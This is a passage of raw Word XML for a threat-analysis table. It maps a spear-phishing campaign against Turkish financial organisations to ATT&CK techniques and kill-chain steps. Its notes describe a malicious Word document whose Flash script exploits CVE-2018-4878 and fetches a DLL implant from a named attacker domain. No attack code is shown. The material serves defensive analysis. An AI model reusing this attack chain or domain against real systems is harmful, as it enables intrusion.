                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55E041B8" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17461812" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707E1013" w14:textId="22A091C6" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66942EEA" w14:textId="577B5C98" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7716376A" w14:textId="463B28AC" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A58C549" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="00B857D7" w14:paraId="6E08CEB7" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C6C064A" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="173A07F2" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="284F9832" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="108E825F" w14:textId="26EA06C2" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="00700D9E" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4953116F" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EACA7EE" w14:textId="329C11B4" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462C1F93" w14:textId="5D103127" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="00DC5C9D" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
            <w:r w:rsidR="00D14A34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C4128F" w14:textId="7F002AC2" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="005E0C97">
              <w:t>Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="00B857D7" w14:paraId="1B5009C8" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62EF295B" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C127109" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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3A872C1A" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB3C65F" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39354B9D" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6508325F" w14:textId="2860021B" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CE1E0E" w14:textId="52E97DBF" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="00DC5C9D" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B63B628" w14:textId="7233388C" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] C</w:t>
            </w:r>
            <w:r w:rsidRPr="005E0C97">
              <w:t>ontaining a malicious Microsoft Word document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="00B857D7" w14:paraId="240B8098" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689401B0" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1111BA72" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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702A6467" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">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663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="255ABE14" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E41B827" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2F64DD" w14:textId="063D85E0" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253AC615" w14:textId="6C5EB367" w:rsidR="006115B2" w:rsidRPr="00B857D7" w:rsidRDefault="00DC5C9D" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACDCBAD" w14:textId="167C5029" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
              <w:t>The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="5BD39E86" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5934CD7C" w14:textId="105E5697" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BBF200" w14:textId="0E2C87C5" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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1A3FCFAE" w14:textId="6B6D65A3" w:rsidR="006115B2" w:rsidRPr="00515311" w:rsidRDefault="006115B2" w:rsidP="006115B2">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1D0F0C59" w14:textId="2E4DFE27" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319852C9" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35AA38F2" w14:textId="1771C402" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="007155BF" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65596668" w14:textId="48B5ABC7" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00C40195" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31BA86D6" w14:textId="7F2FA76E" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="7B773C38" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7B1794" w14:textId="3434B557" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F44405C" w14:textId="39749CAF" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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78660114" w14:textId="284E2442" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C445F9D" w14:textId="58D1D1D0" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A37AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78DD7458" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A842F18" w14:textId="0145A178" w:rsidR="006115B2" w:rsidRPr="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006115B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6614F3E8" w14:textId="5D4A16DB" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDDFE72" w14:textId="35D87922" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="7B52B0B2" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C1241B" w14:textId="3E1AB100" w:rsidR="006115B2" w:rsidRPr="00083830" w:rsidRDefault="00083830" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7492E736" w14:textId="57CF5C8F" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00BF3E39">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">5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63" w:type="dxa"/>
          </w:tcPr>
